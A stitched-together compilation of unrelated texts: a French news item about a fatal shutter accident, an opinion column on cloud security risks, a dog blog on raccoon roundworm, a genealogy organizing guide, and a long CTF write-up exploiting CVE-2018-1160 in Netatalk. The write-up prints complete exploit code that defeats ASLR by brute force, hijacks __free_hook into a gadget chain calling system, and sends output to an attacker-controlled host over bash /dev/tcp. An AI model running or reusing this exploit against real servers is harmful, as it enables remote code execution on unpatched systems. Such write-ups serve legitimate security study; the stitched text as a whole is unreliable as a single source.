File photo: Julie Kertesz/Flickr The 68-year-old woman died on Sunday afternoon at her home in Sorgues, not far from Avignon in southeastern France. She was reportedly closing her window shutters at the time, when a 110 km/h gust of wind slammed the shutters into her head. One of the shutters, known in French as volets, "smashed the woman's skull", the local prosecutor said, according to the Dauphiné Libéré newspaper. Emergency crews were unable to revive the woman, who died at the scene. The strong winds over the weekend saw around 30 calls to emergency services in the area, mostly for structural damage and fallen trees. Photo: Google Maps
Earlier this year, an employee who had been terminated from his job at a car dealership disabled more than 100 cars using a cloud-based application. The app evidently worked in conjunction with a device that dealers attached to the car to disable it or make it start honking as an incentive to get dead-beat car loan holders to pay up. The people who bought cars from that dealership felt violated, humiliated, and angry. Allegedly, the horns were only supposed to honk between 9:00 AM and 5:00 PM, instead of the middle of the night as some owners claimed. Other owners said that they had to have their "disabled" cars towed in the morning, which also made them late for work. Sure, these folks accepted a device like this on a car purchase because financial difficulties would have prevented them from securing a loan otherwise. But we can expect to see more cases where the most vulnerable members of society find themselves exploited the worst by emerging cloud technologies. This particular case is a little unusual, because the person who exploited the system was an employee of the car dealership, not the cloud provider who offered the service. However, I still think this is a liability that is – at the very least – made worse by cloud-based apps. An internally-hosted application could be designed to be unavailable over the public network. As a matter of fact, the challenge with internally-based apps that makes the cloud so attractive is making those internal apps available to remote employees who have a legitimate need to access them. If the only way to get into the aforementioned system was to be at the dealership on a trusted machine, authenticated on the dealership's LAN, this story would not have made national news, because the former, disgruntled employee wouldn't have been able to carry out his plans. It also means that this application is accessible through the public network to any hacker who might want to try his or her hand at some mischief. 
I've already expressed my concern about cloud start-ups with great ideas and horrible execution (ma.gnolia's loss of users' online bookmarks, which led them to close their operations last year). I predicted that this kind of failure was not necessarily limited to small start-ups with good ideas and poorly implemented technology. T-Mobile, Microsoft, and the Sidekick also found themselves in the middle of a high-profile controversy when there was serious data loss for Sidekick users. This was just another example of the risks that companies and individuals take when they adopt a cloud-based solution and trust another company to treat their data with the same care as their in-house IT staff would. And while these weren't disasters huge enough to make everyone pause and consider the cloud a little more carefully, unfortunate examples like that will come.

In the discussion following my post about hybrid computing, we brought up some of the security concerns that wise companies are considering when contemplating a move to cloud-based providers like Google. Most of these are either unique to cloud-based providers or made potentially more severe by using cloud-based solutions. The risk of rogue employees planting back doors into a network or systems and then activating them after leaving the organization always exists, but I would argue that by maintaining control of your own data, systems, and networks, you have better assurance that all due diligence is being taken to avoid that kind of situation. My shop has a security response policy for when anyone from the IT department with privileged access departs, either voluntarily or involuntarily: an immediate flurry of secure password changes for all admin and domain admin accounts takes place, the departed employee's accounts are disabled, and all security policies are reviewed. This isn't a guarantee that a skilled employee who has been plotting won't find some way to bypass our security measures, but it is a measure of control.
Each person on my team is also held personally accountable, and because of the size of my organization, any employee who leaves is fully aware that his or her actions are easily traced. The nature of having a close-knit team is that the departing employee often leaves behind friends and colleagues, professional networks, and possibly poker buddies. In a large cloud-based corporation, there are hundreds and perhaps thousands of faceless IT engineers, some of whom are underappreciated, bitter, and disenchanted. They have no personal ties or obligations. In their eyes, I'm just a faceless customer of a company they believe has wronged them. There are lots of inherent benefits to having your IT staff be part of your local team of employees, and I think this is a lesson that's going to be learned the hard way over the next few years by companies looking to increase profits and decrease IT headaches by seeking outsourced and off-shored cloud-based solutions.

The way I see it, I've been predicting these situations for a couple of years now, while much of the tech industry has been gleefully riding into the sunset, proclaiming the cloud-based future of PC computing. This doesn't mean that I'm right, but it does mean that I'm thinking about it, which is more than a lot of the industry is doing. While most people are hoping for the dust to settle with a clear and obvious path to follow for the future, each mishap or incident makes the future look that much more obscured. There are a lot of compelling reasons to consider cloud-based solutions, and like everyone in the IT industry, I'm looking at where the cloud fits into my IT road map for the future. I think it would be irresponsible for any IT manager not to. The cloud will affect the way we all do business, the models we implement, and the economic impact those solutions have on our IT shops and our companies.
At the same time, the cloud pushes us forward into a future where the checks and balances and best security practices of the past are simply ineffectual, and the only real alternative is to jump in, hope for safety in numbers, and know that while some of the herd might get taken down, it likely won't be you. The success of the cloud depends on us adopting certain attitudes. After all, security is mostly an illusion – locks that keep the honest people honest. The fact is that even in the most talented IT shops in the world, a single human error lets the bad guys in. The bad guys, on the other hand, just sit back and try and try again, confident that eventually they'll find an unlocked door or a lock that isn't any good. Anyone who works in security must acknowledge that fact. I'm also well aware that the bad guys are far smarter than I am. I've known brilliant guys in the security industry, but I don't think any of them have broken 1024-bit RSA encryption by starving the CPU of voltage. My fear is that the keyholes you find in the cloud could be large enough to fit a Mack truck.

So, what do you think? Am I being overly paranoid and too conservative in my opinion about adopting cloud strategies? I really want more feedback and dialog about this, because I'm strongly considering advocating several cloud solutions in my day job. Do we all just jump in and trust these large faceless corporations – with purposefully limited SLAs and tons of plausible deniability – to be good shepherds of our electronic data? Please share your feedback in the discussion thread.

Donovan Colbert has over 16 years of experience in the IT industry. He's worked in help-desk, enterprise software support, systems administration and engineering, and IT management, and is a regular contributor for TechRepublic. Currently, his professional role is as a Linux support engineer for a fast-growing Linux/FOSS consultancy group.
You can follow him @dcolbert on Twitter or his personal blog, located at http://donovancolbert.blogspot.com.
April 30th 2012 1:11 pm [ View A Comments (4) ] Ick! Ick! our first diary entry and it has to be something like this.. We were informed by our dogtor last week that there have been six reported cases of raccoon roundworms in dogs in our little corner of the world. Four recovered but two went to the Bridge. Apparently this particular worm can be very serious for us dogs, sometimes fatal. It was because of this that the dogtor recommended we be wormed monthly, but just how many months we should do it we don't know. We had never heard of this worm before so we went searching for info, and here's what we learned.... Dogs can become infected from coming into contact with raccoon feces, from ingestion of the eggs, or from ingestion of animal tissue that is infected with the roundworm (e.g., rabbits, birds, etc.), or from close contact with other infected animals. It can often be treated in adult dogs, but is almost always fatal for puppies. (note: same for cats and kittens). In addition, because the worm sometimes attacks the brain and nervous system, this infection may be mistaken for rabies. If rabies is suspected, you may wish to ask your veterinarian to test for the presence of the roundworm. There is lots of info if you query "raccoon roundworm dogs", here are a few of the sites we visited: Ohio State University factsheet Humans can get it too Since we go to parks/trails where there are raccoons, mom decided better safe than sorry, she picked up meds (Strongid) from the dogtor and we had our first dose today - here's hoping everything will be ok. Stay safe out there every fur! BOL BOL This is good info to know. So many of us have raccoon neighbors. YIKES!!! Dose darn waccoons an' dere yucky werms an' germs an' junk :( Fanks fur tellin' us 'bout it, wadies! that sounds very scary. We don't have raccoons here, but we have lots of other types of worms, including French heartworm, so we take a pill every month! Oh no! 
Just something else for mommy to worry about; probably not so much in our neck of the woods. But we do like to travel. I'm not enjoying summer so much this year - the heat!
When beginning your family history research, it's easy to think that it will be simple to keep track of what information you have and what you have yet to find. You'll quickly discover that it's not so simple. Below are tips for organizing both your genealogical research and your findings.

Organizing Your Research
Spending more time tracing your family history is the ultimate goal. Starting out with research logs and task lists will allow you to do just that. Research logs are an excellent way to keep track of the research you have already accomplished. Good research logs have a place to record the following information:
- Date of research (be sure to include all 4 digits of the year)
- Repository (archive, library, cemetery, or vital record office)
- Call number (manuscript number, library call number, or microfilm number)
- Description of source (put your full source citation)
- Comments or Results (What did you look for? Did you find it? Was the record hard to read?)
- Miscellaneous fields, such as:
  - Time period
  - Condition of source
  - How the source was searched (index or page-by-page)
  - ISBN (for locating a book elsewhere)

Download our research log to start organizing your research.

Task Lists or To-Do Items
Note questions when they arise—you may not remember the question later. Tracking this can be done in a variety of ways:
- Use to-do items, logs, or task lists found in your genealogy software
- Use a general word processing, spreadsheet, or database program
- Keep a small notebook with you to jot down research questions

Organizing Your Findings
Your computer is an important organizational tool. Beyond recording and organizing your findings within a genealogical software program (see our software comparison chart), there are many other programs that can assist you.

Organizing (and Preserving) Your Family Stories
Preserve the family stories you find, know, or receive from family members.
- Word processing program
- Genealogy software (easier to locate the family story as it is attached to an individual)

Organizing Data as You Go
You may come across someone whose connection to your family is unclear; however, you don't want to lose the information. There are many programs that can assist with this:
- Census data
- Census spreadsheets can be created in any spreadsheet program
- Clooz (a Windows desktop application that helps organize and analyze data)
- Cemetery and obituary transcriptions
- City directories, deeds, and more
- Create your own transcriptions in a word processing program

Other Valuable Programs
Consider using a Notebook program to track every note, detail, photo, source, or URL:

Organizing Your Files
As you progress with your research you will find that files multiply exponentially. The documents and images you uncover are all part of the process. File them in a way—electronically, physically, or both—in which you can easily find them. Most filing systems rely on certain principles: arrange the documents in notebooks or file folders; use an index or table of contents; be consistent. Even if you are determined to go a paperless route, there are still some documents, diaries, and photographs you will have in a non-digitized version. Organize these in a manner similar to your electronic files. Regardless of what system you use or where you store your files, remember to be consistent with file names, localities, and arrangement. Build a hierarchy of folders. Below is an example that leads to files for Lemuel Patraw (where each level is a sub-folder of the previous one):
- Johnson Family Tree
  - Patraw Surname
    - Lemuel Patraw

When naming files, especially those of documents, include details on the source. Some examples:
- File name: 1900 Nati no 122 Nataloni fhl2221027.tif — 1900 birth, record no. 122, surname Nataloni, found on FHL microfilm 2221027
- File name: Lemuel patraw ww1 st paul db4.jpg — World War I draft card for Lemuel Patraw, who registered with the St. Paul, Minnesota, Draft Board No. 4

Organizing Digital Images
If you are working with a lot of digitized photos, keep a log of where they are stored. Items to keep in your log could include:
- File name
- Date of file
- Description of file (subject of image)
- Individuals included
- Location of the original (should you ever need to replace your digital file)

When storing your images, whether taken with a camera, scanned from a microfilm, or saved from an online digitized document, it is always a good idea to store them in multiple locations, including:

Organizing Bookmarks and Email
If it is easier to do an online search for a site you are trying to reach than to locate it in your list of favorites or bookmarks, then it is definitely time to organize your links.
- Take advantage of your browser's "Favorites" or "Bookmarks"
- Make sure you create general folders such as:
  - General Genealogy

Use a similar approach for email. "Filters" within your email program direct messages into certain folders. This way you can work just on e-mails dealing with a given family, rather than jumping from one to the next as you open each email in your Inbox.

Further Reading
- Online seminar by Rhonda R. McClure, Getting Started in Genealogy
- Rhonda R. McClure, Portable Genealogist: Organizing Your Research (Boston: NEHGS, 2013)
- Sharon DeBartolo Carmack, Organizing Your Family History Search: Efficient & Effective Ways to Gather and Protect Your Genealogical Research (Cincinnati, Ohio: Betterway Books, 1999)
- William Dollarhide, Managing a Genealogical Project (Baltimore, Md.: Genealogical Publishing Company, Inc., 1999)

Want to maximize your research? The experts at NEHGS can help! We offer a number of services that can help you break down brick walls and expand your research.
Meet one-on-one with our genealogists
Want research guidance from a professional genealogist? Our experts provide 30-minute to two-hour consultations in person or by phone.
- Find elusive ancestors—Whether you are searching in the U.S. or abroad, in the 17th or 20th century, our genealogists have the knowledge to assist you.
- Locate and use records—Vital records, military records, deeds, probate, and more—if you're wondering where to look for them, how to read them, or what data you can find in them, we can guide you.
- Get more out of technology—Feel like you could be making better use of your genealogy software? Curious about websites and databases that might be relevant to your research? Let us help!

Hire our experts in Research Services
Whether you are just beginning your family research or have been researching for years, NEHGS Research Services is here to assist you. Our team of experts can:
- Conduct hourly research
- Break down "brick walls"
- Retrieve manuscript materials
- Obtain probate records
- Research and prepare your lineage society application
- Organize your materials and files
- Write narrative biographies about your ancestors
- Create customized family charts
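As a practical aside, the research-log fields listed at the top of this guide map naturally onto a spreadsheet. The short Python sketch below is an illustration only — the file name and example entry are made up, and the column set follows the field list above, using nothing beyond the standard csv module:

```python
import csv

# Column names taken from the research-log field list in this guide.
FIELDS = ["Date of research", "Repository", "Call number",
          "Description of source", "Comments or Results"]

def start_research_log(path):
    """Create a new research log with a header row."""
    with open(path, "w", newline="") as f:
        csv.DictWriter(f, fieldnames=FIELDS).writeheader()

def add_entry(path, entry):
    """Append one research entry (a dict keyed by the field names)."""
    with open(path, "a", newline="") as f:
        csv.DictWriter(f, fieldnames=FIELDS).writerow(entry)

start_research_log("research_log.csv")
add_entry("research_log.csv", {
    "Date of research": "2013-05-04",
    "Repository": "NEHGS Library",
    "Call number": "FHL microfilm 2221027",
    "Description of source": "1900 birth record no. 122, surname Nataloni",
    "Comments or Results": "Found the entry; film was hard to read",
})
```

Any spreadsheet program can open the resulting file directly, and the same columns work just as well as a template for a paper log.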
This blog post covers:
- Defeating ASLR
- Execution control hijacking through __free_hook
- A looooot of bruteforcing

It was a beautiful evening in my place of residence. I was wasting my time watching random YouTube videos, and then I finally decided to do something with my life and go back to sharpening my CTF skills. So I logged in to pwnable.tw for the first time in literally ages, and there it was, in front of me, a new challenge named CVE-2018-1160. The task was simple: develop a 1-day exploit for this particular vulnerability.

A little bit of research led me to this blog post by Jacob Baines, the person who originally found the vulnerability. The principle is really simple: Netatalk, an open source program that allows Unix-like operating systems to act as file servers for Macintosh computers, could potentially memcpy data out of bounds.

Excuse me, a what?!

In simpler words: Netatalk could access memory regions that the original program was not meant to. I am not going to go too much into detail here, as Baines' blog post explains in depth how the vulnerability works, so please go and read it thoroughly. Then come back here for a more universal exploit.

Baines' exploit in the blog post that you should have read by now does not work on systems that have ASLR enabled. In a nutshell, ASLR is a security feature that aims to make an attacker's life harder by adding some randomness to where things can be found in memory. For example, imagine that you want to redirect program execution to a piece of code that lives at memory address 0xCAFEBABE. If ASLR is not enabled, you know that the code will always be in the same place, and your exploit can simply overwrite RIP to jump to it. However, the world is rarely that kind to us exploit developers, and most of the time ASLR is indeed enabled. This means that you don't know the exact address where your function is in memory (maybe 0xCAFEBABE or maybe 0xDEADBEEF).
Exploitation is not impossible though! ASLR just gives you an extra task: first figure out where things are in memory, and then redirect program execution. This is the case with the Netatalk challenge, and now I am going to describe how I defeated ASLR and got the flag.

Expanding the original exploit

Although ASLR can look impossible to beat at times, there are a few tricks that can be leveraged to leak one single address, and as it turns out, sometimes that is all we need.

Brute-force all the things!

As Baines' blog post explains, the exploit works by overwriting the dsi->commands buffer address. The problem right now is that we don't know which address we need to write there. One of the first things I did was try to gain a deeper understanding of how the Netatalk server works, and it is quite simple: there is a main program that listens on the network; when a client connects, it forks a new process which takes care of handling the new connection, and the main (parent) process goes back to listening.

Simply reading the code did not give me any useful ideas, but I got a hint from a few other blog posts: ASLR is weak against brute-forcing attacks. That is when I got my first idea:

- As I said before, Netatalk forks a new process after a connection is made.
- When a process is forked, the child process is an exact copy of the parent process.
- If the child process crashes, the parent is unaffected in this case.

How can I use this to brute-force the address of dsi->commands? The answer is to guess one byte of the address at a time: if we guess wrong, the child process will crash and our connection to the server will be broken; on the other hand, if the guess is correct, the server will return us some data.
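This guessing game is easy to sanity-check offline before writing any network code. In the sketch below, crash_oracle is a hypothetical stand-in for the real server: it "survives" only when the submitted bytes are a correct prefix of the secret address (the concrete address here is made up):

```python
import struct

# Made-up target: the 6 significant bytes of an address, little endian.
SECRET = struct.pack("<Q", 0x7f299d000000)[:6]

def crash_oracle(guess: bytes) -> bool:
    """Stand-in for a netatalk child process: it survives (True) only if
    `guess` is a prefix of the real commands-buffer address."""
    return SECRET.startswith(guess)

leak = b""
while len(leak) < 6:
    for i in range(256):
        candidate = leak + struct.pack("B", i)
        if crash_oracle(candidate):  # child survived -> correct byte
            leak = candidate
            break

print(hex(struct.unpack("<Q", leak.ljust(8, b"\x00"))[0]))  # 0x7f299d000000
```

Worst case this takes 6 * 256 = 1536 attempts — the linear cost that makes byte-at-a-time leaks practical, versus 2^48 tries for guessing the whole address at once.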
Ok, let's jump to the first code snippet of the exploit. I begin by defining a few helper functions (I took them from Baines' blog, not gonna lie), then I proceed to open a connection to the Netatalk server and start brute-forcing!

```python
from pwn import *
import struct
import sys
import time

# Creates a DSI packet to send to the server with the given command
# and payload. command should be 1 byte.
def CreateDSIRequest(command, payload):
    dsi_header = b"\x00"                          # "request" flag
    dsi_header += command
    dsi_header += b"\x00\x01"                     # request id
    dsi_header += b"\x00\x00\x00\x00"             # data offset
    dsi_header += struct.pack(">I", len(payload)) # payload length
    dsi_header += b"\x00\x00\x00\x00"             # reserved
    dsi_header += payload
    return dsi_header

# Creates a DSIOpenSession request that exploits the vulnerability,
# overwriting the address of dsi->commands.
def OverwriteCommandBuffer(target_addr):
    dsi_payload = b"\x00\x00\x40\x00"            # client quantum
    dsi_payload += b"\x00\x00\x00\x00"           # overwrites data size
    dsi_payload += struct.pack("I", 0xdeadbeef)  # overwrites server quantum
    dsi_payload += struct.pack("I", 0xf00dbabe)  # ids
    dsi_payload += target_addr                   # commands address to overwrite

    dsi_opensession = b"\x01"                    # attention quantum option
    dsi_opensession += struct.pack("B", len(dsi_payload))  # length (/)o,,o(/)
    dsi_opensession += dsi_payload

    # \x04 is the open session command.
    return CreateDSIRequest(b"\x04", dsi_opensession)
```

Then I use those helper functions to trigger the vulnerability:
while len(leak_addr) < 6: for i in range(256): conn = remote(ip, port) candidate_byte = struct.pack("B", i) # We use the helper function to overwrite one byte of the commands buffer # at a time. data = OverwriteCommandBuffer(b"\x00\x01", leak_addr + candidate_byte) response = send_data(data, conn) # None in this case means the connection is broken (process crashed). if response is not None: # So if we received something, it means our guess was correct leak_addr += candidate_byte break conn.close() # Pretty-print the address in hex print(hex(struct.unpack("<Q", leak_addr.ljust(8, b'\x00')))) You may be wondering: Why does the process crash when we guess the wrong data? Well it seems that netatalk, after receiving a create session request, attempts to write some data to the dsi->commands buffer. So if the guess is wrong, the program will try to write something to a memory address it doesn’t have access to, thus it will crash. Running this small piece of code on my local virtual machine (btw you can use the following command to run the neatatalk server: export LD_LIBRARY_PATH=$PWD; ./afpd -d -F ./afp.conf) gives me the address: 0x7f299d000000, this first leaked address is all we need to start building a scarier exploit. We have an address! now we have to find out how to make something useful out of it. Our ultimate objective is to read the flag file. Therefore I decided that a return to libc attack was the way to go. In a nutshell, this attack involves figuring out the base address of libc and then redirecting the program execution to a function there, in this case we are going to return to the system function. 
Ok, so our next task is to use the address we just got to figure out where libc lives in memory.

If we take a look at the memory map of a child process (cat /proc/process_id/maps) we can find where libc starts (in a program running locally, of course). Our goal is to go from 0x7f299d000000 (the address we got in the previous step) to 0x7f299e3a0000 (the libc base address). Figuring out where libc is in memory is the hardest part of this CTF. I tried (and failed) many ideas until I finally came up with something that worked consistently.

First I thought I could compute the difference between the leaked address and the libc base address, and that maybe this difference would be a constant. However, this is not the case: the delta between both addresses differs depending on the kernel version.

Then I took a closer look at the process memory map to see which memory region contains our leaked address, and I asked myself: can I figure out the base address of this memory region? Would it be easier to calculate the libc base address from there? As it turns out, the answer to both questions was yes.

Memory Address Minimization Search Algorithm

How do we go from 0x7f299d000000 (the leaked address) to 0x7f299cdff000 (the base address)? First of all, both addresses are very close (the first two bytes are the same: 0x7f and 0x29), and the third byte is off by just one (0x9c vs 0x9d). This last fact is interesting, because it means that when our leak algorithm tried 0x9c it landed in an invalid memory region, but once it incremented that guess by one it was back in a valid section. So I came up with this idea:

- Let base_leak_addr be the first two bytes of the leaked commands address
- Starting from byte 3 and until byte 6, repeat the following:
- Bruteforce the byte
- If the byte found is at position 6, add it to base_leak_addr and finish the algorithm.
- Otherwise, subtract one from the byte and set the following bytes to \xFF
- Send a new request with this other address; if we receive a response, assign (byte - 1) to base_leak_addr, otherwise assign byte

Practical example: when we reach the point where we have bruteforced 0x7f299d, we send a request with 0x7f299cffffff. Since this address is valid, we receive a reply from the Netatalk server, so we know the right byte guess is 0x9c, not 0x9d. Once this algorithm finishes, it yields the base address of the memory region: 0x7f299cdff000.

Heads up! The memory addresses in the code are encoded in little endian; that's why you may see the bytes referred to in reverse order.

```python
leak_addr_byte_array = list(leak_addr)  # leak_addr is the leaked commands addr

# Try to find the base addr of the memory section.
index = 3
while index >= 0:
    print(leak_addr_byte_array)
    for i in range(256):
        temp_array = list(leak_addr_byte_array)
        print("bruteforce base addr")
        print("trying byte " + str(i))
        print(temp_array)
        temp_array[index] = i
        conn = remote(ip, port)
        data = OverwriteCommandBuffer(bytes(temp_array))
        response = send_data(data, conn)
        conn.close()
        if response is not None:
            if index == 0 or i == 0:
                leak_addr_byte_array[index] = i
                break
            # Probe one step below with trailing \xFF bytes.
            temp_array[index] = i - 1
            for j in range(index - 1, -1, -1):
                temp_array[j] = 0xFF
            conn = remote(ip, port)
            data = OverwriteCommandBuffer(bytes(temp_array))
            response = send_data(data, conn)
            conn.close()
            if response is None:
                leak_addr_byte_array[index] = i
            else:
                leak_addr_byte_array[index] = i - 1
            break
    index -= 1

base_val = u64(bytes(leak_addr_byte_array).ljust(8, b'\x00'))  # our leaked base addr
```

Gaining execution control

Let's quickly remember what the goal was before I dived into the previous algorithm: finding out where libc lives in memory.
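One step back before the control hijacking: the minimization routine is easy to test offline against a mock validity oracle. In this sketch, is_mapped is a hypothetical stand-in for a live connection — it answers whether an address falls inside the mapped region, which is exactly the signal a surviving child process gives us — and the region base and size are made up for the test:

```python
import struct

BASE = 0x7f299cdff000    # region start (what we want to recover)
LEAKED = 0x7f299d000000  # address recovered by the byte-wise leak

def is_mapped(addr: int) -> bool:
    """Hypothetical oracle: True iff the child would survive writing here.
    The 0x400000 region size is an assumption for this offline test."""
    return BASE <= addr < BASE + 0x400000

addr_bytes = list(struct.pack("<Q", LEAKED)[:6])  # little endian, 6 used bytes

for index in range(3, -1, -1):  # refine bytes 3..0 (little endian)
    for i in range(256):
        trial = list(addr_bytes)
        trial[index] = i
        if not is_mapped(int.from_bytes(bytes(trial) + b"\x00\x00", "little")):
            continue
        if index == 0 or i == 0:
            addr_bytes[index] = i
            break
        # Probe one step below with trailing 0xFF bytes: if that address is
        # also mapped, the region extends below this byte value.
        trial[index] = i - 1
        for j in range(index):
            trial[j] = 0xFF
        below = int.from_bytes(bytes(trial) + b"\x00\x00", "little")
        addr_bytes[index] = i - 1 if is_mapped(below) else i
        break

base_val = int.from_bytes(bytes(addr_bytes) + b"\x00\x00", "little")
print(hex(base_val))  # 0x7f299cdff000
```

Running it recovers 0x7f299cdff000 from 0x7f299d000000, exactly as in the worked example above.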
In order to explain how I managed to find the right offset between the leaked base address and libc, I first need to explain how the execution control portion of the exploit works (please bear with me, it will all make sense in the end).

Grabbing a disassembler, I took a look at how the system libc function expects to receive its arguments: the first instruction is a check to make sure that whatever is stored in the rdi register is not null (0), which means that system expects its argument (a pointer to the command string) to be passed in this register. So the next mission is to figure out the following:

- Which command to execute? (easy! something like /bin/sh or cat flag…)
- Where to store this command?
- How to redirect execution control to system?

Let's begin with the last question. At first I had no idea how to redirect program execution; then I came across the malloc hooks and some random exploit sources explaining how to abuse them. The basic idea is that if you can overwrite the address that one of those hooks points to, program execution will be redirected once the respective function is executed. So I picked libc's free as my vehicle to start the execution flow hijacking. Let's take a look at its disassembly: here we can see that whatever __free_hook points to is loaded into rax, and if the loaded value is not NULL (0), the execution flow gets redirected there.

This is the gate to hijacking program control. The next step is to find small snippets of assembly code (called gadgets) in Netatalk or any of its linked libraries that can be leveraged to set up the state we want and make a call to system; this is a variation of return oriented programming. Our next three gadgets are going to help set the state:

- setcontext + 0x35: This is an amazing gadget; it allows us to set every single register based on what the rdi register is pointing to!
- fgetpos64 + 0xCF: Allows us to set rdi to whatever rax is pointing to, and then jump to a position relative to rax
- __libc_dlopen_mode + 0x38: Loads whatever is stored in _dl_open_hook (yes, another hook we can overwrite!) and then jumps to where this value is pointing

Therefore, the final exploit workflow goes like this:

- Overwrite __free_hook to point to the dl_open_mode gadget
- Set _dl_open_hook pointing at the fgetpos64 gadget
- fgetpos64 will in turn set the rdi register and then call the setcontext gadget
- setcontext will put all the registers in a state ready to call system and jump to it
- system will be executed and we will have successfully completed the exploit!

Finally: where are all the parameters, the command string, etc. going to be stored? It turns out that the space between __free_hook and _dl_open_hook is a memory region of decent size (a couple of hundred bytes) that we can freely write into. Since dsi_opensession seems to write some data to dsi->commands before it returns, the exploit leaves a small buffer to accommodate that: we trigger the overwrite so the commands pointer points to __free_hook - 0x10 (16 bytes of extra space).

The exploit is triggered with the following steps:

- An opensession request overwrites the commands pointer with the desired address
- An execute-command request containing our payload writes all the desired values into the right memory positions
- A close-session command calls the free function, which kicks off the hijacking of the execution control
The final payload of the exploit looks like this:

1. 8 bytes of filler data (not important)
2. The address of the fgetpos64 gadget (8 bytes; rax points here after executing the dl_open_mode gadget)
3. The address of the dl_open_mode gadget (__free_hook points here)
4. Filler data (16 bytes, to align [rax + 0x20] with the address of setcontext)
5. The address of the setcontext gadget (this is [rax + 0x20])
6. The parameters to setcontext, in order (each one 8 bytes; most of the values are random except for rdi, rsp and the return address): rdi = free_hook_addr + 0xB0 (the commands buffer), rsp = base_addr + 0x400 - 0x8 (some random memory position where the stack can be written; the -0x8 16-byte aligns the stack). Total size: 0x88 bytes
7. Filler bytes (8 bytes)
8. The command to execute lives here! (len(command) bytes)
9. A huge filler of size dl_open_hook_addr - free_hook_addr - (the number of bytes we have already written)
10. free_hook_addr - 0x08 (_dl_open_hook points here)

Let's see how this madness looks in code (note that the value of libc_offset is needed; for testing purposes this value was calculated manually by looking at the memory map of a local process):

```python
ip = 'netatalk server ip'
port = 'netatalk port'
e = ELF('path to libc.so.6')

def do_exploit(libc_offset, cmd):
    # base_val is the base addr we leaked previously
    print("base program addr at " + str(hex(base_val)))
    base_libc_addr = base_val + libc_offset
    print("base libc addr at " + str(hex(base_libc_addr)))
    free_hook_addr = base_libc_addr + e.symbols['__free_hook']
    print("free hook addr at " + str(hex(free_hook_addr)))
    dl_open_hook_addr = base_libc_addr + e.symbols['_dl_open_hook']
    print("dl_open_hook_addr at " + str(hex(dl_open_hook_addr)))
    dlopen_mode_addr = base_libc_addr + e.symbols['__libc_dlopen_mode'] + 0x38
    print("dlopen_mode_gadget_addr " + str(hex(dlopen_mode_addr)))
    fgetpos64_gadget_addr = base_libc_addr + e.symbols['fgetpos64'] + 0xCF
    print("fgetpos_64_gadget_addr " + str(hex(fgetpos64_gadget_addr)))
    setcontext_gadget_addr = base_libc_addr + e.symbols['setcontext'] + 0x35
    print("setcontext_gadget_addr " + str(hex(setcontext_gadget_addr)))
    system_addr = base_libc_addr + e.symbols['system']
    print("system addr " + str(hex(system_addr)))

    free_hook_addr_bytes = struct.pack("<Q", free_hook_addr - 16)

    conn = remote(ip, port)
    print("Starting connection")
    data = OverwriteCommandBuffer(b"\x00\x01", free_hook_addr_bytes)
    print(send_data(data, conn))

    # First start with an initial filler (8 bytes)
    payload = b"\x41" * 8
    # Put the addr of our getpos gadget (8 bytes)
    payload += struct.pack("<Q", fgetpos64_gadget_addr)

    # Keep track of the total size of this first portion of the buffer; we
    # need it later to calculate the size of the big filler between
    # __free_hook and _dl_open_hook, so the number of bytes written in
    # between matters. Note that we don't count the previous 16 bytes, as
    # they sit before the addr of __free_hook.
    total_size = 0

    # Put the pointer to the dlopen_mode gadget (8 bytes); this overwrites __free_hook
    payload += struct.pack("<Q", dlopen_mode_addr)
    total_size += 8

    # Now we need some filler bytes (filler no. 1): the fgetpos64 gadget
    # moves execution to whatever is pointed to by rax + 0x20. Currently rax
    # points at the addr of the getpos gadget, so we insert 0x10 bytes of
    # filler to align things
    # (0x20 - 0x8 (getpos gadget addr) - 0x8 (dlopen_mode_addr))
    payload += b"\x41" * 0x10
    total_size += 0x10

    # Put the addr of our setcontext gadget (8 bytes)
    payload += struct.pack("<Q", setcontext_gadget_addr)
    total_size += 8

    # Set the arguments for the setcontext gadget
    r8 = 0
    r9 = 1
    r12 = 1
    r13 = 1
    r14 = 1
    r15 = 1
    rdi = free_hook_addr + 0xB0  # cmd buffer
    rsi = 0x1111
    rbp = 0x1111
    rbx = 0x1111
    rdx = 0x1211
    rcx = 0x1211
    rsp = base_val + 0x400 - 0x8
    rspp = system_addr  # system
    payload += flat(r8, r9, 0, 0, r12, r13, r14, r15,
                    rdi, rsi, rbp, rbx, rdx, 0, rcx, rsp, rspp)
    total_size += 136

    # Random bytes to align things
    payload += struct.pack("<Q", 0x42)
    total_size += 8

    # Put the command to execute
    payload += cmd
    total_size += len(cmd)

    # Finally we write the big filler between the hooks
    payload += b"\x00" * (dl_open_hook_addr - free_hook_addr - total_size)
    payload += struct.pack("<Q", free_hook_addr - 8)
    data = CreateDSIRequest(b"\x02", payload)
    print("poison!")
    print(send_data(data, conn))

    # Create the close request
    data = CreateDSIRequest(b"\x01", b"")
    print("close!")
    print(send_data(data, conn))
    conn.close()
```

Finding libc, part 2

When I first wrote the exploit I simply calculated the libc offset on an Ubuntu 18.04 virtual machine and prayed that my remote (pwnable) target had the same offset. But that did not work… These offsets change depending on the kernel version, and I had no way to determine which version my remote target was running. I thought I had hit a dead end, when I had one final moment of clarity: taking a look at the memory map, I noticed that the offsets between memory regions are always multiples of 0x1000. Furthermore, the offset between our dear old base_addr and the libc address seemed to be around 0x5000000. So it occurred to me: what if I also bruteforce this offset?
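To get a feel for how feasible that is: sweeping every 0x1000-aligned offset between 0x4000000 and 0x6000000 is only a few thousand attempts.

```python
# Size of the bruteforce search space for the libc offset
start, end, step = 0x4000000, 0x6000000, 0x1000
attempts = (end - start) // step
print(attempts)  # 8192 attempts in the worst case
```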
I would only need to do increments of 0x1000, and thus the search space is not that big. So I decided to do exactly that! Here is the final code to find this offset:

```python
libc_offset = 0x4000000
response_ip = b"AN IP YOU CONTROL"
response_port = b"A PORT YOU CONTROL"

while libc_offset < 0x6000000:
    print(hex(libc_offset))
    # Build the command inside the loop so the echoed value matches the
    # offset currently being tried
    cmd = b'bash -c "echo %s > /dev/tcp/%s/%s"\x00' % (
        bytes(hex(libc_offset), encoding='utf8'), response_ip, response_port)
    do_exploit(libc_offset, cmd)
    libc_offset += 0x1000
```

As ugly as it looks, we simply iterate over all the values between 0x4000000 and 0x6000000 in increments of 0x1000. Once we hit the sweet, sweet spot of the right offset, all the pieces of the exploit come together, and the right offset is echoed back to an IP and port we control. I executed this final piece of code and went to bed. In the morning I woke up to the surprise that it had worked perfectly! I had the offset of libc, and therefore I could execute any command I wanted. And this is how I captured the flag and defeated ASLR.

Conclusion: Innocent mistakes can carry serious consequences

